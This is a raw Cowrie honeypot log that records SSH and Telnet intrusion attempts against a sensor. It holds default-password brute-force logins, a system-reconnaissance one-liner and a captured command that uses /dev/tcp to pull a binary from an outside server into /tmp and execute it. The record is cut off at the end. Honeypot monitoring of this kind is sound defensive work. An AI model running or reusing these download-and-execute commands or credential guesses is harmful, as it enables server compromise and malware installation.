{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.178362Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.179377Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.180066Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.180564Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.181130Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.181751Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.182260Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.451323Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.452203Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.453112Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":43206,"dst_ip":"1.2.3.4","dst_port":22,"session":"be90fc613d7e","protocol":"ssh","message":"New connection: 170.64.157.139:43206 (1.2.3.4:22) [session: be90fc613d7e]","sensor":"my-vps","timestamp":"2025-09-08T17:46:47.260693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:46:47.261399Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:46:47.550858Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:46:48.443999Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:46:49.079369Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.080074Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.080885Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.081981Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.083034Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.083970Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.084655Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.085610Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.086110Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.086716Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.087257Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.087946Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.088417Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.379972Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.381443Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:46:49.382432Z","src_ip":"170.64.157.139","session":"be90fc613d7e"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":52304,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea03c5c95ae9","protocol":"ssh","message":"New connection: 170.64.157.139:52304 (1.2.3.4:22) [session: ea03c5c95ae9]","sensor":"my-vps","timestamp":"2025-09-08T17:48:03.581712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:48:03.582447Z","src_ip":"170.64.157.139","session":"ea03c5c95ae9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:48:03.879059Z","src_ip":"170.64.157.139","session":"ea03c5c95ae9"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-09-08T17:48:05.189889Z","src_ip":"170.64.157.139","session":"ea03c5c95ae9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:48:06.488575Z","src_ip":"170.64.157.139","session":"ea03c5c95ae9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42394,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3ca6fbac642","protocol":"telnet","message":"New connection: 212.227.125.160:42394 (1.2.3.4:23) [session: c3ca6fbac642]","sensor":"my-vps","timestamp":"2025-09-08T17:48:43.395746Z"}
{"eventid":"cowrie.session.closed","duration":1.843705415725708,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:48:45.239378Z","src_ip":"212.227.125.160","session":"c3ca6fbac642"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":40022,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2ad6b0de469","protocol":"ssh","message":"New connection: 8.138.136.155:40022 (1.2.3.4:22) [session: b2ad6b0de469]","sensor":"my-vps","timestamp":"2025-09-08T17:48:51.445107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T17:48:51.445995Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T17:48:51.446469Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T17:48:52.141954Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:48:53.363060Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:48:53.820412Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T17:48:53.822247Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/vBdtZvNN7V && chmod +x /tmp/vBdtZvNN7V && /tmp/vBdtZvNN7V QXQzZsfNkswh1SY42CHYk8zEfDN0PT5tJXnByIvTK9A4JNYp1JXNxX8rZTo0ejp5zNKU1SDOIi7aJdKUyMdoM3o9P2wlecbKi9Mm1Swg0CLTlPYXK8yjzibsHnE6LJENDoMyVoQgQ/q2oA==\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/vBdtZvNN7V && chmod +x /tmp/vBdtZvNN7V && /tmp/vBdtZvNN7V QXQzZsfNkswh1SY42CHYk8zEfDN0PT5tJXnByIvTK9A4JNYp1JXNxX8rZTo0ejp5zNKU1SDOIi7aJdKUyMdoM3o9P2wlecbKi9Mm1Swg0CLTlPYXK8yjzibsHnE6LJENDoMyVoQgQ/q2oA==\" &","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.054926Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/VFIH2k4dCN","message":"CMD: head -c 1458464 > /tmp/VFIH2k4dCN","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.058593Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.296378Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.301635Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.305334Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/babf4e5c088c7ff3665c87708d66b4e6ee2b6e55aa0d5952dc3b7dbe503094e8","size":1968,"shasum":"babf4e5c088c7ff3665c87708d66b4e6ee2b6e55aa0d5952dc3b7dbe503094e8","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/babf4e5c088c7ff3665c87708d66b4e6ee2b6e55aa0d5952dc3b7dbe503094e8 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.307266Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:49:00.308734Z","src_ip":"8.138.136.155","session":"b2ad6b0de469"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34984,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f16d6612841","protocol":"ssh","message":"New connection: 212.227.125.160:34984 (1.2.3.4:22) [session: 2f16d6612841]","sensor":"my-vps","timestamp":"2025-09-08T17:49:05.446796Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:49:05.447887Z","src_ip":"212.227.125.160","session":"2f16d6612841"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":41298,"dst_ip":"1.2.3.4","dst_port":22,"session":"61c633b6ff33","protocol":"ssh","message":"New connection: 170.64.157.139:41298 (1.2.3.4:22) [session: 61c633b6ff33]","sensor":"my-vps","timestamp":"2025-09-08T17:49:24.682415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:49:24.683243Z","src_ip":"170.64.157.139","session":"61c633b6ff33"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:49:24.946071Z","src_ip":"170.64.157.139","session":"61c633b6ff33"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-09-08T17:49:25.743398Z","src_ip":"170.64.157.139","session":"61c633b6ff33"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:49:27.102162Z","src_ip":"170.64.157.139","session":"61c633b6ff33"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58066,"dst_ip":"1.2.3.4","dst_port":22,"session":"fada0de900a9","protocol":"ssh","message":"New connection: 217.72.205.35:58066 (1.2.3.4:22) [session: fada0de900a9]","sensor":"my-vps","timestamp":"2025-09-08T17:49:51.515013Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:49:51.517156Z","src_ip":"217.72.205.35","session":"fada0de900a9"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":47186,"dst_ip":"1.2.3.4","dst_port":22,"session":"82d901a0c25a","protocol":"ssh","message":"New connection: 170.64.157.139:47186 (1.2.3.4:22) [session: 82d901a0c25a]","sensor":"my-vps","timestamp":"2025-09-08T17:50:47.269058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:50:47.269925Z","src_ip":"170.64.157.139","session":"82d901a0c25a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","dif